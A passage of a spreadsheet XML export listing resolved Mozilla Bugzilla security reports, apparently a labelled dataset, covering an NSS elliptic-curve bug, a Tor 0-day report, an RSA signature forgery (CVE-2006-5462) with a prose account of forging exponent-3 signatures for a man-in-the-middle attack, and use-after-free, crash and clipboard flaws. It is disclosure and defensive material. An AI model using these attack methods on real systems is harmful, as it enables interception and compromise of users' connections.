This was tested in the 19/Nov/99 nightly build.</t>
        </is>
      </c>
      <c r="X4515" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4516">
      <c r="A4516" t="n">
        <v>1352039</v>
      </c>
      <c r="B4516" t="inlineStr">
        <is>
          <t>2017-03-30 05:12:24 -0700</t>
        </is>
      </c>
      <c r="C4516" t="inlineStr">
        <is>
          <t>Issue with elliptic curve addition in mixed Jacobian-affine coordinates</t>
        </is>
      </c>
      <c r="D4516" t="inlineStr">
        <is>
          <t>2024-05-30 09:31:10 -0700</t>
        </is>
      </c>
      <c r="E4516" t="n">
        <v>1</v>
      </c>
      <c r="F4516" t="n">
        <v>1</v>
      </c>
      <c r="G4516" t="n">
        <v>3</v>
      </c>
      <c r="H4516" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4516" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J4516" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K4516" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L4516" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4516" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4516" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4516" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4516" t="inlineStr">
        <is>
          <t>[adv-main55+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4516" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4516" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4516" t="inlineStr">
        <is>
          <t>3.31</t>
        </is>
      </c>
      <c r="T4516" t="n">
        <v>1</v>
      </c>
      <c r="U4516" t="n">
        <v>0</v>
      </c>
      <c r="V4516" t="n">
        <v>18</v>
      </c>
      <c r="W4516" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:52.0) Gecko/20100101 Firefox/52.0
Build ID: 20170316213829
Steps to reproduce:
The implemented elliptic curve point  addition  algorithm that uses mixed Jacobian-affine coordinates is currently incorrect. It may yield a result POINT_AT_INFINITY when it should not.
You can find the implementation in 
https://hg.mozilla.org/projects/nss/file/215207b4864c/lib/freebl/ecl/ecp_jm.c
ec_GFp_pt_add_jm_aff(const mp_int *px, const mp_int *py, const mp_int *pz,
                     const mp_int *paz4, const mp_int *qx,
                     const mp_int *qy, mp_int *rx, mp_int *ry, mp_int *rz,
                     mp_int *raz4, mp_int scratch[], const ECGroup *group)
Actual results:
The ec_GFp_pt_add_jm_aff implements the algorithm found in "Software Implementation of the NIST Elliptic Curves Over Prime Fields" (http://citeseerx.ist.psu.edu/viewdoc/download;jsessionid=7F30DF02245F1428D542471889BEEAAB?doi=10.1.1.144.5095&amp;rep=rep1&amp;type=pdf) page 12 algorithm 3.
It does implement the algorithm verbatim as in the paper . 
The problem is that in the formula reported in the paper  is actually incomplete. Indeed it can happen that
C = X2 Z1^2  -  A is equal to zero .
This will eventually yield  a result POINT_AT_INFINITY (since C is everywhere in the formulas) when it should not.
Expected results:
You can find the correct algorithm in https://en.wikibooks.org/wiki/Cryptography/Prime_Curve/Jacobian_Coordinates (Point Addition (12M + 4S)).
There this case is taken in consideration
...
if (U1 == U2)
  if (S1 != S2)
    return POINT_AT_INFINITY
  else 
    return POINT_DOUBLE(X1, Y1, Z1)
and the outcome would be POINT_DOUBLE(X1, Y1, Z1)</t>
        </is>
      </c>
      <c r="X4516" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4517">
      <c r="A4517" t="n">
        <v>901365</v>
      </c>
      <c r="B4517" t="inlineStr">
        <is>
          <t>2013-08-04 11:57:37 -0700</t>
        </is>
      </c>
      <c r="C4517" t="inlineStr">
        <is>
          <t>Firefox 0-day found on Tor .onion service (reported on Reddit)</t>
        </is>
      </c>
      <c r="D4517" t="inlineStr">
        <is>
          <t>2021-09-21 16:39:13 -0700</t>
        </is>
      </c>
      <c r="E4517" t="n">
        <v>1</v>
      </c>
      <c r="F4517" t="n">
        <v>1</v>
      </c>
      <c r="G4517" t="n">
        <v>3</v>
      </c>
      <c r="H4517" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4517" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4517" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4517" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4517" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4517" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4517" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4517" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4517" t="inlineStr">
        <is>
          <t>fixed by June 25, 2013 releases in bug 857883</t>
        </is>
      </c>
      <c r="Q4517" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4517" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4517" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4517" t="n">
        <v>1</v>
      </c>
      <c r="U4517" t="n">
        <v>3</v>
      </c>
      <c r="V4517" t="n">
        <v>31</v>
      </c>
      <c r="W4517" t="inlineStr">
        <is>
          <t>Reddit is reporting a Firefox 0-day that has been injected on some .onion sites (Tor hidden services).
http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
The most complete link I've seen appears to be
http://pastebin.mozilla.org/2777139 (and copied to
http://pastebin.mozilla.org/2781408 in case the first link is ephemeral)
I've also seen
http://pastebin.com/pmGEj9bV
http://pastebin.com/K61QZpzb
http://pastebin.mozilla.org/2776374
and I'm not sure where they're all from or how they're related (look duplicative).
No point in hiding the bug at this point, this is all over the twitters and will just collect dupes.</t>
        </is>
      </c>
      <c r="X4517" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4518">
      <c r="A4518" t="n">
        <v>1344467</v>
      </c>
      <c r="B4518" t="inlineStr">
        <is>
          <t>2017-03-04 03:01:43 -0800</t>
        </is>
      </c>
      <c r="C4518" t="inlineStr">
        <is>
          <t>Uninitialized value in nsDirIndexParser::ParseFormat</t>
        </is>
      </c>
      <c r="D4518" t="inlineStr">
        <is>
          <t>2024-05-30 09:30:01 -0700</t>
        </is>
      </c>
      <c r="E4518" t="n">
        <v>1</v>
      </c>
      <c r="F4518" t="n">
        <v>1</v>
      </c>
      <c r="G4518" t="n">
        <v>3</v>
      </c>
      <c r="H4518" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4518" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4518" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K4518" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L4518" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4518" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4518" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4518" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4518" t="inlineStr">
        <is>
          <t>[necko-active][adv-main53+][adv-esr52.1+][adv-esr45.9+]</t>
        </is>
      </c>
      <c r="Q4518" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4518" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4518" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T4518" t="n">
        <v>1</v>
      </c>
      <c r="U4518" t="n">
        <v>0</v>
      </c>
      <c r="V4518" t="n">
        <v>27</v>
      </c>
      <c r="W4518" t="inlineStr">
        <is>
          <t>Created attachment 8843567
httpindex1.php
Steps to reproduce:
--------------------
1. Build firefox with valgrind using instructions mentioned in
   https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Valgrind
2. Download and copy httpindex1.php and httpindex2.php to local web server.
   Web server should support PHP.
3. Start firefox
   * Enable Multi-process option should be disabled in firefox.
     Otherwise firefox tab crash due to some other valgrind errors.
   export VALGRIND_OPTIONS="--smc-check=all-non-file --vex-iropt-register-updates=allregs-at-mem-access --show-mismatched-frees=no --read-inline-info=yes"
  ./mach run --debugger="valgrind" --debugger-args="$VALGRIND_OPTIONS"
4. Visit httpindex1.php or httpindex2.php
Valgrind will display error. Valgrind output is attached under Crash Signature.
Cause of bug
-------------
Bug is in nsDirIndexParser::ParseFormat method of netwerk\streamconv\converters\nsDirIndexParser.cpp file.
"mFormat" int array created by this method can contain uninitialized value due to 2 reasons.
1. "http-index-format" content does not contain any format values.
    ex: 200:\r\n
        201:a\r\n
   nsDirIndexParser::ParseFormat method creates an int array with 2 elements for "mFormat", even though there are no values in format line. 
2. "http-index-format" content contains invalid values. 
   ex: 200:a a a
       201:a a a
   nsDirIndexParser::ParseFormat method creates an int array with 4 elements for "mFormat", even though there are invalid values in format line.</t>
        </is>
      </c>
      <c r="X4518" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4519">
      <c r="A4519" t="n">
        <v>356215</v>
      </c>
      <c r="B4519" t="inlineStr">
        <is>
          <t>2006-10-10 15:00:19 -0700</t>
        </is>
      </c>
      <c r="C4519" t="inlineStr">
        <is>
          <t>FF1507 RSA signature forgery: unchecked padding length (CVE-2006-5462)</t>
        </is>
      </c>
      <c r="D4519" t="inlineStr">
        <is>
          <t>2010-06-17 20:52:04 -0700</t>
        </is>
      </c>
      <c r="E4519" t="n">
        <v>1</v>
      </c>
      <c r="F4519" t="n">
        <v>1</v>
      </c>
      <c r="G4519" t="n">
        <v>3</v>
      </c>
      <c r="H4519" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4519" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J4519" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K4519" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4519" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4519" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4519" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4519" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4519" t="inlineStr">
        <is>
          <t>[sg:critical][need testcase] dupe bug 330114</t>
        </is>
      </c>
      <c r="Q4519" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4519" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4519" t="inlineStr">
        <is>
          <t>3.11.3</t>
        </is>
      </c>
      <c r="T4519" t="n">
        <v>1</v>
      </c>
      <c r="U4519" t="n">
        <v>0</v>
      </c>
      <c r="V4519" t="n">
        <v>16</v>
      </c>
      <c r="W4519" t="inlineStr">
        <is>
          <t>security@mozilla.org received the following from Ulrich Kuehn:
Dear Security Group,
I've found an implementation bug in handling a certain RSA signature
padding format that allows a man-in-the-middle attack on SSL and TLS
connections under certain circumstances. I'll go into details below.
The bug seems to be present in versions 1.5.0.7 and earlier of firefox
and potentially of other mozilla software that uses the nss subsystem.
I noticed that the problem is resolved in the firefox 2.0 since beta 1
(on the ftp server marked as of Aug 29, 2006).
However, I ask you to backport a patch to the current version 1.5.0.7 as
I believe that users should not be forced to do a major version upgrade
due to a security bug that could easily be fixed. And the fix is really
easy, see attached diff. Maybe the maintainer updating the code did not
notice that this seemingly small bug has some severe consequences?
Now for the technical details. This bug is somewhat related on a
mathematical level to the recent bug that Daniel Bleichenbacher found
for PKCS#1 signature verification. Nevertheless, it does not involve any
ASN.1 parsing.
The problem is in security/nss/lib/softoken/rsawrapr.c, function
RSA_CheckSign():
    /*
     * check the padding that was used
     */
    if (buffer[0] != 0 || buffer[1] != 1)
        goto loser;
    for (i = 2; i &lt; modulus_len - hash_len - 1; i++) {
        if (buffer[i] == 0)
            break;
        if (buffer[i] != 0xff)
            goto loser;
    }
    /*
     * make sure we get the same results
     */
    if (PORT_Memcmp(buffer + modulus_len - hash_len, hash, hash_len) != 0)
        goto loser;
This code runs over the PKCS#1 padding, but would accept an early 0
byte, so that a padding of
          00 || 01 || 00 || g || hash
with any garbage in g, provided g is long enough to put the hash into
the correct place for the following memcmp. A word of acknowledgement is
due here, this code was independently found by Hal Finney, however, the
consequences seem not be known to him (see
http://www.mail-archive.com/cryptography@metzdowd.com/msg06693.html)
Producing a fake signature, i.e. a non-signature that is nevertheless
accepted by this code, is rather easy when an RSA exponent 3 is used for
usual key lengths (potentially also some larger exponents with longer
keys), as the unchecked part provides enough play ground for an
adversary. If you are interested I could provide some more detail here
on the mathematics. The key point is that with exponent 3 you can use
computing 3rd roots over the real numbers, not modulo N, the RSA
modulus. The former is easy, while the hardness of the latter is the
usual security assumption for RSA.
So basically, when a certificate uses exponent 3, we can produce a fake
signature that is accepted by this code.
Here is how to exploit that. The function RSA_CheckSign() is called
during SSL/TLS connection setup when the server sends a
serverkeyexchange message. This message contains new keys to be used by
the client for exchange of the premaster secret. The keys are signed by
the key in the server certificate. For validation the firefox client
computes the md5||sha1 combined hash of the key parameters (plus the
public random bytes) and checks that against the signature of the
server, using the RSA_CheckSign() function.
So a man-in-the-middle attack is easy when a site uses a certificate
containing an RSA key with exponent 3: the adversary sends the
certificate (he does not have the private key!) and then also sends a
serverkeyexchange message, containing the fake signature. This can
easily be produced only, the computation is quick.
So basically the certificate chain can be exploited to make the client
believe it is connected to the original server, while it is not.
Phishing etc. is easy now.
If you have any further questions please do not hesitate to contact me.
Attached you will find my gpg key, and a diff of the relevant portion of
1.5.0.7 against 2.0b1 which fixes the problem. Please seriously consider
providing a patch for 1.5.0.7.
With best regards,
Ulrich Kuehn</t>
        </is>
      </c>
      <c r="X4519" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4520">
      <c r="A4520" t="n">
        <v>1128939</v>
      </c>
      <c r="B4520" t="inlineStr">
        <is>
          <t>2015-02-03 06:22:09 -0800</t>
        </is>
      </c>
      <c r="C4520" t="inlineStr">
        <is>
          <t>MP4 crash access violation</t>
        </is>
      </c>
      <c r="D4520" t="inlineStr">
        <is>
          <t>2024-05-30 08:39:45 -0700</t>
        </is>
      </c>
      <c r="E4520" t="n">
        <v>1</v>
      </c>
      <c r="F4520" t="n">
        <v>1</v>
      </c>
      <c r="G4520" t="n">
        <v>3</v>
      </c>
      <c r="H4520" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4520" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4520" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K4520" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4520" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4520" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N4520" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4520" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4520" t="inlineStr">
        <is>
          <t>[adv-main36+]</t>
        </is>
      </c>
      <c r="Q4520" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4520" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4520" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T4520" t="n">
        <v>1</v>
      </c>
      <c r="U4520" t="n">
        <v>0</v>
      </c>
      <c r="V4520" t="n">
        <v>39</v>
      </c>
      <c r="W4520" t="inlineStr">
        <is>
          <t>Created attachment 8558510
crashowa.mp4
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Steps to reproduce:
firefox.exe crashowa.mp4
Actual results:
Firefox 35.0.1 - crash
nightly - tab crash
(b4c.8ec): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\MSVCR100.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll - 
MSVCR100!wcspbrk+0xa8:
66dc0ab6 660f7f7760      movdqa  xmmword ptr [edi+60h],xmm6 ds:002b:12519000=????????????????????????????????
Expected results:
error: invalid mp4 file</t>
        </is>
      </c>
      <c r="X4520" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4521">
      <c r="A4521" t="n">
        <v>466937</v>
      </c>
      <c r="B4521" t="inlineStr">
        <is>
          <t>2008-11-26 22:03:05 -0800</t>
        </is>
      </c>
      <c r="C4521" t="inlineStr">
        <is>
          <t>File stealing with SessionStore</t>
        </is>
      </c>
      <c r="D4521" t="inlineStr">
        <is>
          <t>2009-02-03 17:29:49 -0800</t>
        </is>
      </c>
      <c r="E4521" t="n">
        <v>1</v>
      </c>
      <c r="F4521" t="n">
        <v>1</v>
      </c>
      <c r="G4521" t="n">
        <v>2</v>
      </c>
      <c r="H4521" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4521" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4521" t="inlineStr">
        <is>
          <t>Session Restore</t>
        </is>
      </c>
      <c r="K4521" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4521" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4521" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4521" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4521" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4521" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q4521" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4521" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4521" t="inlineStr">
        <is>
          <t>Firefox 3.6a1</t>
        </is>
      </c>
      <c r="T4521" t="n">
        <v>1</v>
      </c>
      <c r="U4521" t="n">
        <v>0</v>
      </c>
      <c r="V4521" t="n">
        <v>24</v>
      </c>
      <c r="W4521" t="inlineStr">
        <is>
          <t>It's possible to change the type of an input control during restoration.</t>
        </is>
      </c>
      <c r="X4521" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4522">
      <c r="A4522" t="n">
        <v>1219339</v>
      </c>
      <c r="B4522" t="inlineStr">
        <is>
          <t>2015-10-28 10:31:18 -0700</t>
        </is>
      </c>
      <c r="C4522" t="inlineStr">
        <is>
          <t>Race condition in GetStaticInstance can cause use after free</t>
        </is>
      </c>
      <c r="D4522" t="inlineStr">
        <is>
          <t>2024-05-30 09:06:42 -0700</t>
        </is>
      </c>
      <c r="E4522" t="n">
        <v>1</v>
      </c>
      <c r="F4522" t="n">
        <v>1</v>
      </c>
      <c r="G4522" t="n">
        <v>3</v>
      </c>
      <c r="H4522" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4522" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4522" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K4522" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L4522" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4522" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4522" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4522" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4522" t="inlineStr">
        <is>
          <t>[adv-main45+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4522" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4522" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4522" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T4522" t="n">
        <v>1</v>
      </c>
      <c r="U4522" t="n">
        <v>0</v>
      </c>
      <c r="V4522" t="n">
        <v>83</v>
      </c>
      <c r="W4522" t="inlineStr">
        <is>
          <t>GetStaticInstance (media\webrtc\trunk\webrtc\system_wrappers\interface\static_instance.h) can experience a race condition. If this occurs, it spuriously decrements its reference count, causing the object protected by it to be destroyed and its memory to be released before all of the code streams using it have been terminated.
Details
-------
The bug is in the handling of the kAddRef case (which is used in at least 2 places in the codebase [1]), and is illustrated by a thread race graph below the affected code:
34: template &lt;class T&gt;
35: // Construct On First Use idiom. Avoids
36: // "static initialization order fiasco".
37: static T* GetStaticInstance(CountOperation count_operation) {
38:   // TODO (hellner): use atomic wrapper instead.
39:   static volatile long instance_count = 0;
40:   static T* volatile instance = NULL;
41:   CreateOperation state = kInstanceExists;
42: #ifndef _WIN32
...
89: #else  // _WIN32
...
107:   } else if (count_operation == kAddRef) {
108:     if (instance_count == 0) {
109:       state = kCreate;
110:     } else {
111:       if (1 == InterlockedIncrement(&amp;instance_count)) {
112:         // InterlockedDecrement because reference count should not be
113:         // updated just yet (that's done when the instance is created).
114:         InterlockedDecrement(&amp;instance_count);
115:         state = kCreate;
116:       }
117:     }
118:   } else { [kRelease]
119:     int new_value = InterlockedDecrement(&amp;instance_count);
120:     if (new_value == 0) {
121:       state = kDestroy;
122:     }
123:   }
124: 
125:   if (state == kCreate) {
126:     // Create instance and let whichever thread finishes first assign its
127:     // local copy to the global instance. All other threads reclaim their
128:     // local copy.
129:     T* new_instance = T::CreateInstance();
130:     if (1 == InterlockedIncrement(&amp;instance_count)) {
131:       InterlockedExchangePointer(reinterpret_cast&lt;void * volatile*&gt;(&amp;instance),
132:                                  new_instance);
133:     } else {
134:       InterlockedDecrement(&amp;instance_count);
135:       if (new_instance) {
136:         delete static_cast&lt;T*&gt;(new_instance);
137:       }
138:     }
139:   } else if (state == kDestroy) {
140:     T* old_value = static_cast&lt;T*&gt;(InterlockedExchangePointer(
141:         reinterpret_cast&lt;void * volatile*&gt;(&amp;instance), NULL));
142:     if (old_value) {
143:       delete static_cast&lt;T*&gt;(old_value);
144:     }
145:     return NULL;
146:   }
147: #endif  // #ifndef _WIN32
148:   return instance;
149: }
Assume |instance_count == 0| and |instance == nullptr| initially, and |count_operation == kAddRef| for both threads:
Thread 1                                       Thread 2
--------                                       --------
Execute lines 107-09, notice that              Execute lines 107-09, notice that     
|instance_count == 0| and thus set             |instance_count == 0| and thus set
|state = kCreate|                              |state = kCreate|
Execute lines 125-29, notice that              Execute lines 125-29, notice that     
|state == kCreate| and create a                |state == kCreate| and create a
new instance of T into |*new_instance|         new instance of T into |*new_instance|
Execute line 130, notice that
|instance_count == 1|. Execute lines 131-32,
replacing |instance| with |new_instance|,
then execute line 148,
returning |instance| to the caller.
                                               Execute line 130, notice that |instance_count == 2|,
                                               and execute lines 134-37, decrementing |instance_count| to 1,
                                               and deleting |new_instance|, then execute line 148,
                                               returning |instance| to the caller.
Use |instance| for awhile...                   Use |instance| for awhile...
Call GetStaticInstance with |kRelease|.
Execute lines 119-21, decrementing
|instance_count| to 0, noticing that,
and setting |state = kDestroy|.
Execute lines 140-41 (nulling |instance|)
and lines 142-43 (destroying and freeing
|instance|'s old value.
                                               Continue using the now-destroyed and freed |instance|.
BTW, I am also unsure whether the ordinary reads of |instance_count| and |instance| are compatible with the interlocked operations performed on those variables under all relevant architectures.
This bug is still present in the current trunk: http://hg.mozilla.org/mozilla-central/file/fc706d376f06/media/webrtc/trunk/webrtc/system_wrappers/interface/static_instance.h .
[1] media\webrtc\trunk\webrtc\modules\rtc_rtcp\source\ssrc_database.cc and media\webrtc\trunk\webrtc\system_wrappers\source\trace_impl.cc .
    It is also used in the test code media\webrtc\trunk\webrtc\test\channel_transport\udp_socket_manager_wrapper.cc .</t>
        </is>
      </c>
      <c r="X4522" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4523">
      <c r="A4523" t="n">
        <v>589027</v>
      </c>
      <c r="B4523" t="inlineStr">
        <is>
          <t>2010-08-19 19:04:32 -0700</t>
        </is>
      </c>
      <c r="C4523" t="inlineStr">
        <is>
          <t>Hook to use a template in a wiki article</t>
        </is>
      </c>
      <c r="D4523" t="inlineStr">
        <is>
          <t>2010-11-12 10:39:39 -0800</t>
        </is>
      </c>
      <c r="E4523" t="n">
        <v>1</v>
      </c>
      <c r="F4523" t="n">
        <v>1</v>
      </c>
      <c r="G4523" t="n">
        <v>5</v>
      </c>
      <c r="H4523" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4523" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4523" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K4523" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4523" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4523" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4523" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4523" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4523" t="inlineStr"/>
      <c r="Q4523" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4523" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4523" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T4523" t="n">
        <v>1</v>
      </c>
      <c r="U4523" t="n">
        <v>0</v>
      </c>
      <c r="V4523" t="n">
        <v>7</v>
      </c>
      <c r="W4523" t="inlineStr">
        <is>
          <t>We need to allow template hooks.
Syntax: [[Template:Template name|arg_1=value_1|...|arg_n=value_n]]
This just turns above syntax with the processed template, substituting the arguments for "%s" or "%(arg_1)s"-like substrings.</t>
        </is>
      </c>
      <c r="X4523" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4524">
      <c r="A4524" t="n">
        <v>257523</v>
      </c>
      <c r="B4524" t="inlineStr">
        <is>
          <t>2004-08-31 06:18:03 -0700</t>
        </is>
      </c>
      <c r="C4524" t="inlineStr">
        <is>
          <t>Text fields give scripts access to the user's clipboard</t>
        </is>
      </c>
      <c r="D4524" t="inlineStr">
        <is>
          <t>2007-11-17 11:27:49 -0800</t>
        </is>
      </c>
      <c r="E4524" t="n">
        <v>1</v>
      </c>
      <c r="F4524" t="n">
        <v>1</v>
      </c>
      <c r="G4524" t="n">
        <v>3</v>
      </c>
      <c r="H4524" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4524" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4524" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K4524" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4524" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4524" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4524" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4524" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4524" t="inlineStr">
        <is>
          <t>[sg:fix] fixed1.7.3</t>
        </is>
      </c>
      <c r="Q4524" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4524" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4524" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4524" t="n">
        <v>1</v>
      </c>
      <c r="U4524" t="n">
        <v>0</v>
      </c>
      <c r="V4524" t="n">
        <v>28</v>
      </c>
      <c r="W4524" t="inlineStr">
        <is>
          <t>Text fields accept script-generated events. You cannot send Ctrl-C - this is a
menu shortcut, so untrusted events will be rejected. But you can send Ctrl-Ins,
which is implemented in the text field itself. This way you can put every text
you want into the user's clipboard. And you can send Shift-Ins to insert
whatever you have in your clipboard into the text field.
I've tested this on Windows but it should work as well at least with KDE, it has
same shortcuts.</t>
        </is>
      </c>
      <c r="X4524" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4525">
      <c r="A4525" t="n">
        <v>924900</v>
      </c>
      <c r="B4525" t="inlineStr">
        <is>
          <t>2013-10-09 06:46:39 -0700</t>
        </is>
      </c>
      <c r="C4525" t="inlineStr">
        <is>
          <t>Story - Remove auto sync setup code</t>
        </is>
      </c>
      <c r="D4525" t="inlineStr">
        <is>
          <t>2014-07-24 11:06:19 -0700</t>
        </is>
      </c>
      <c r="E4525" t="n">
        <v>1</v>
      </c>
      <c r="F4525" t="n">
        <v>1</v>
      </c>
      <c r="G4525" t="n">
